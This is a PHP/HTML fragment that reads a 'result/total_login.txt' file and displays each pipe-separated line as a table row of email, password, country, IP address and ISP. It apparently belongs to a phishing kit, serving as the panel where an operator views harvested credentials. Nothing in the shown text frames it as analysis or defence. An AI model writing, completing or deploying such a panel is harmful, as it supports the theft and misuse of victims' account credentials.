
<table class="table table-hover">
<thead class="text-warning">
  <th>Email</th>
  <th>Password</th>
  <th>Country</th>
  <th>IP</th>
  <th>ISP</th>
  </tr>
</thead>
<tbody>
  <?php
  if(file_exists("result/total_login.txt")){
  $bin2 = file_get_contents("result/total_login.txt");
  $bin2 = explode("\n", $bin2);
  $counny = count($bin2);
  foreach($bin2 as $bins2) {
      $bins2 = explode("|", $bins2);
      echo "<tr>
      <td>".$bins2[0]."</td>
      <td>".$bins2[1]."</td>
      <td>".$bins2[2]."</td>
      <td>".$bins2[3]."</td>
      <td>".$bins2[4]."</td>
      </tr>";
  }
  }else{
      echo "<tr><td>Oops :(</td><td></td><td></td><td></td><td></td></tr>";
  }
  ?>
  </tbody>
</table>